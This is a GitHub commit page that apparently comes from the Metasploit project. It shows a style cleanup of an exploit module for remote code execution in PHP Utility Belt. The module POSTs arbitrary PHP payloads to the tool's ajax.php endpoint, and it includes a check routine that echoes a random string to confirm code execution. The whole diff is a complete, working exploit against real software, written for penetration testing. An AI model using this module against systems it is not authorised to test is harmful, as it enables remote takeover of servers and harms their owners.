Clean up module

rapid7 · Mar 9, 2016 · 52d12b6 · 52d12b6
1 parent 62a611a
commit 52d12b6
Showing 1 changed file with 29 additions and 26 deletions.
diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb
@@ -6,73 +6,76 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'           => 'PHP Utility Belt Remote Code Execution',
       'Description'    => %q{
-         This module exploits a remote code execution vulnerability in PHP utility Belt
+         This module exploits a remote code execution vulnerability in PHP Utility Belt,
          which is a set of tools for PHP developers and should not be installed in a
-         production environment because this application runs arbitrary PHP code as an
+         production environment, since this application runs arbitrary PHP code as an
          intended functionality.
       },
-      'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'WICS', # initial discovery
+          'WICS',     # initial discovery
           'Jay Turla' # msf
         ],
       'References'     =>
         [
-          [ 'EDB', '38901' ],
-          [ 'URL', 'https://github.com/mboynes/php-utility-belt' ] # Official Repo
+          ['EDB', '38901'],
+          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
         ],
+      'DisclosureDate' => 'Aug 12 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
       'Privileged'     => false,
       'Payload'        =>
         {
-          'Space'    => 2000,
-          'DisableNops' => true,
+          'Space'       => 2000,
+          'DisableNops' => true
         },
-      'Platform'       => 'php',
-      'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          ['PHP Utility Belt', { } ]
+          ['PHP Utility Belt', {}]
         ],
-      'DisclosureDate' => 'Aug 12 2015',
-      'DefaultTarget'  => 0))
+      'DefaultTarget'  => 0
+    ))
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The path of PHP utility belt', '/php-utility-belt/ajax.php']),
-      ],self.class)
+        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
+      ], self.class)
   end
 
   def check
     txt = Rex::Text.rand_text_alpha(8)
     res = http_send_command("echo #{txt};")
 
-    if res && res.body =~ /#{txt}/
-      return Exploit::CheckCode::Vulnerable
+    if res && res.body.include?(txt)
+      Exploit::CheckCode::Vulnerable
     else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 
+  def exploit
+    http_send_command(payload.encoded)
+  end
+
   def http_send_command(cmd)
-    res = send_request_cgi({
-      'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path),
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
       'vars_post' => {
         'code' => cmd
       }
-    })
+    )
   end
 
-  def exploit
-    http_send_command("#{payload.encoded}")
-  end
 end